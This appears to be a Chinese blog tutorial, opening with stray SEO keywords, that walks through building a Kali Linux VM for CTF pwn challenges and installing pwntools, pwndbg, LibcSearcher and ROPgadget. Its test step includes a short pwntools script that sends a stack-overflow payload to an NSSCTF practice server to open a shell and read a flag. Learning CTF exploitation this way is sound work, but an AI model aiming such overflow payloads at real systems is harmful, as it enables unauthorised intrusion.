百度网站诚信认证,做视频背景音乐网站,空间站 参考消息,长沙网站seo诊断工欲善其事必先利其器#xff0c;作为一名CTF的pwn手#xff0c;一定要有自己的专用解题环境。本文将详细记录kali下的pwn解题环境的安装过程#xff0c;B站也会配备配套视频。
目录
安装前的准备工作
虚拟机环境编辑 VM版本安装教程
1. 下载Kali的VM虚拟机文件
2. 新… 工欲善其事必先利其器作为一名CTF的pwn手一定要有自己的专用解题环境。本文将详细记录kali下的pwn解题环境的安装过程B站也会配备配套视频。
目录
安装前的准备工作
虚拟机环境编辑 VM版本安装教程
1. 下载Kali的VM虚拟机文件
2. 新建一个空白文件夹
3. 解压压缩包
4.打开VMware WorkStation
编辑 5. 配置虚拟机的硬件
6.启动虚拟机
7.kali汉化步骤
编辑
8.换源 9.中文输入法安装
pwn环境安装
1.pwntools安装 1、安装指令
2、测试checksec
3、测试pwntools
2.gdb动态调试安装
1、原生gdb安装 2、pwndbg安装 3、测试安装
编辑
3.LibcSearcher安装
4.ROPGadget安装 安装前的准备工作
虚拟机环境
VMware WorkStation VM版本安装教程
1. 下载Kali的VM虚拟机文件
Kali的VM虚拟机文件
Kali的VM虚拟机文件可在Kali官网下载
kali官网Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution 左侧Installer Images为光盘镜像文件右侧Vitrual Machines是我们这次下载的VM虚拟机文件 点击这里下载 最后得到压缩包 2. 新建一个空白文件夹
找一个空间大点的盘新建这个文件夹命名就叫Kali好了 3. 解压压缩包
把第一步下载的VM虚拟机文件解压到当前目录下
对着文件右键解压文件选中你创建的文件夹。 等待解压完成
解压完成会得到
4.打开VMware WorkStation
点击打开虚拟机 选中文件中的这个 5. 配置虚拟机的硬件
打开虚拟机之前需要调整硬件设置 点击编辑虚拟机设置 内存设置电脑本机的内存的一半即可。
处理器1就行。核取一半up的CPU只有8核
硬盘其实60G就完全够用
配置完成记得点击确认保存 6.启动虚拟机
由于这个是配置好的所以默认密码是kali/kali 登录之后的样子全英文有点难受 7.kali汉化步骤
全英文怎么玩给我汉化
右键Kali的桌面点击Open Terminal Here在此处打开控制台 输入指令
一、进入root模式
sudo -i #指令输入后会要求输入kali的密码也就是kali。注意kali输密码光标是不会动的哦 已经入root模式就是红红的
二、更新源不是换源
apt-get update
看到这烦人的下载速度没这就提醒你该换源下载服务器了 CTRLC结束然后先去第8步换源吧 三、设置系统语言
sudo dpkg-reconfigure locales 下方向键一直按着
按到看到zh_CN
选中了之后不要按回车
先按空格变成星星我已踩坑 回车如果没有zh_cn证明没听我话退回去重新操作就行 回车接下里让它自己跑 重启系统应用汉化
reboot
这个不建议改成汉化的因为经常要访问 英文路径好打 8.换源
我看这篇写的挺好那我就偷懒了记得阿里和清华一起上Kali 更换源超详细附国内优质镜像源地址_kali换源-CSDN博客 9.中文输入法安装
1.打开终端输入以下命令root权限哦
apt-get install ibus ibus-pinyin 记得点Y
reboot #重启
右上角切换 pwn环境安装
1.pwntools安装 1、安装指令
进入root
sudo -i
安装指令
sudo pip3 install pwntools2、测试checksec
测试题目位置NSSCTF | 在线CTF平台 把附件拖到kali中重命名为pwn1方便写指令。指令要在桌面路径执行哦。 checksec pwn1 3、测试pwntools
from pwn import *
xianyufenremote(node1.anna.nssctf.cn,28029)#按照服务器地址和端口更改
payloadba*0x2Cp64(0x41348000)
xianyufen.send(payload)
xianyufen.interactive() 我的是这样的
from pwn import *
xianyufenremote(node4.anna.nssctf.cn,28492)#按照服务器地址和端口更改
payloadba*0x2Cp64(0x41348000)
xianyufen.send(payload)
xianyufen.interactive()在桌面用指令建一个python脚本
vim attack.py
然后就可以右键编辑了用Mousepad打开
指令粘贴进去 控制台运行一下
python3 attack.py再输个ls即可看到flag工具已正常安装
2.gdb动态调试安装
1、原生gdb安装 sudo apt install gdb 2、pwndbg安装
访问github获取安装指令GitHub - pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy 安装指令 # 下载仓库
git clone https://github.com/pwndbg/pwndbg 会得到pwndbg项目文件夹 # 移动到文件夹下
cd pwndbg# 可以用ls看一下当前目录下的文件 # 启动安装脚本
./setup.sh 安装时间会有点久 3、测试安装 cd ../ #回到桌面 gdb pwn1 #上一节的栈文件,拿来测试 显示的是pwndbg就对了,打个断点玩一下 b main #main函数打个断点 quit #退出 温馨提示pwndbg那个文件夹别删除 3.LibcSearcher安装
旧版LibcSearcher 安装发现报错 GitHub - lieanu/LibcSearcher: glibc offset search for ctf. 更换别的版本
项目地址如下https://github.com/dev2ero/LibcSearcher 安装指令
pip3 install LibcSearcher
代替在线工具 4.ROPGadget安装
sudo pip install capstone
正常应该是successfully但我这里好像在前面已经装好了 载项目
git clone https://github.com/JonathanSalwan/ROPgadget.git移动至项目文件夹下
cd ROPgadget 安装指令
sudo python3 setup.py install